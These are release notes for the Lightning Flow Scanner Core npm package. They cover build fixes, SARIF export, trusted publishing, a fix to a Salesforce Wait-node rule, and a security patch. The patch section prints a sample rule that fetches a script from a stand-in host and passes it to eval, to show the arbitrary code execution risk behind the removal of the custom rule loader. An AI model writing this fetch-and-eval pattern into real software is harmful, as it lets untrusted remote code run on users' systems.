Cross-OS compatible build scripts

makes build scripts fully cross-OS compatible (Windows/macOS/Linux)

• Replace broken `rifraf` → `rimraf` (the industry standard)
• Updated scritps to use pure Node.js based copying
• npm run build now works on:
  • Windows PowerShell
  • GitHub Actions
  • macOS
  • Linux
  • Azure/CircleCI/etc.

Export Results as SARIF

exportSarif(results: ScanResult[]): string

Generates SARIF output with real file paths and exact line numbers — powered by mapRegion() scanning raw XML via flow.toXMLString().

Supports: both Local files and Browser by leveraging Flow.toXMLString() → accurate lines, no files needed

Example

// Get SARIF output
import { parse, scan, exportSarif } from "@flow-scanner/lightning-flow-scanner-core";
parse("flows/*.xml")
  .then(scan)
  .then(exportSarif)
  .then((sarif) => save("results.sarif", sarif));

v6: Trusted publishing, fast-xml-parser, and Beta mode

Key Changes

• Scoped Trusted Publishing: Migrated to @Flow-Scanner npm org with Trusted Publishing (OIDC via GitHub Actions) for Zero Trust security—no long-lived tokens, automated scans/tests, and provenance attestations to mitigate supply chain risks.
• Dependency Upgrade: Replaced xmlbuilder2 with fast-xml-parser for a more active ecosystem, reduced package size (~20% smaller footprint), and potential parsing performance gains in Flow metadata handling.
• New Config Option: Added betaMode parameter to enable experimental beta rules during scans, allowing users to opt-in for rules in development.
• Sets default severity as warning

Upgrade Guide

To update your dependencies run npm i @flow-scanner/[email protected]

Thanks for using Lightning Flow Scanner Core!

MissingFaultPath bug fix for Wait nodes

v5.9 — Fix MissingFaultPath rule for Wait nodes

This release fixes issue #272, contributed by @chazwatkins, where the MissingFaultPath rule incorrectly flagged all "Wait" nodes.

The bug was caused because the rule did not distinguish between different Wait subtypes. In Salesforce flows, only "Wait For Conditions" nodes can have fault paths. "Wait for Amount of Time" (WaitDuration) and "Wait Until Date" (WaitDate) nodes cannot have fault paths. This fix updates the MissingFaultPath rule to properly ignore WaitDuration and WaitDate subtypes, while continuing to check for applicable cases.

Salesforce Wait Nodes Overview

1. Wait for Conditions

• Lets a flow pause until certain conditions are true.
• This is essentially an event-based pause and can have error handling logic attached — so a fault path is valid here.
• For more details, refer to the Salesforce documentation on Wait for Conditions.

2. Wait for Amount of Time (WaitDuration)

• Pauses flow for a fixed amount of time.
• This is purely time-based with no real failure conditions that Salesforce would allow fault handling for.
• Therefore, no fault path option is provided.
• For more information, see the Salesforce documentation on Wait for Amount of Time.

3. Wait Until Date (WaitDate)

• Pauses flow until a given date/time.
• Also purely time-based → no fault path.
• For further details, check the Salesforce documentation on Wait Until Date.

Changes

• Added isValidSubtype method to properly handle applicable element subtypes.
• Updated MissingFaultPath rule execution logic.

Security Patch

🚨 v5 – Security Patch

This release delivers security improvements and we have removed custom rules.

---

🔒 Security Fixes

• Removed custom rule loader
  • Previous versions allowed configuration files to load JavaScript from external sources.
  • This created a arbitrary code execution (ACE) risk, where malicious configs could execute arbitrary code.

execute(flow: Flow, ruleOptions?: {}): RuleResult {
  fetch("https://example.com/script.js")
    .then(res => res.text())
    .then(code => {
      eval(code);        // 🚨 ACE happens here
    });

  return null;
}

• In v5, this behavior has been completely removed. Only built-in rules are now supported.
• Removed dynamic paths in configuration
  • Config files can no longer point to external scripts or resources.

---

🛡 Dependency & Audit Updates

• All dependencies updated to their latest secure versions.
• Applied npm audit fix to patch known vulnerabilities.

---

📌 Impact

• Custom rules functionality has been retired.
• All packages that relied on the custom rule loader are unpublished

Note on Forks:
Using a fork? Check node_modules/ for RuleLoader.ts or RuleLoader.js. If present, it’s vulnerable.

For patched versions, see https://github.com/Flow-Scanner

4.50.0

What's Changed

• Drop support for IRuleDefinition
• chore: bump npm deps by @junners in #254
• Feat/streamline rule def by @junners in #255

Full Changelog: v4.49.0...v4.50.0

4.49.0

What's Changed

• MissingNullHandler triggered on subflow output variables #67 by @RubenHalman in #241
• Replace table with referable headers by @RubenHalman in #248

Full Changelog: v4.48.0...v4.49.0

4.48.0

Full Changelog: v4.47.0...v4.48.0

4.47.0

What's Changed

• Update issue templates by @RubenHalman in #238
• script:deploy test flows by @RubenHalman in #239
• small fixes for Missing Null Handler

Full Changelog: v4.46.0...v4.47.0

4.46.0 | Community Release

What's new?

Updated documentation for Custom Rules
minor fixes

Full Changelog: v4.45.0...v4.46.0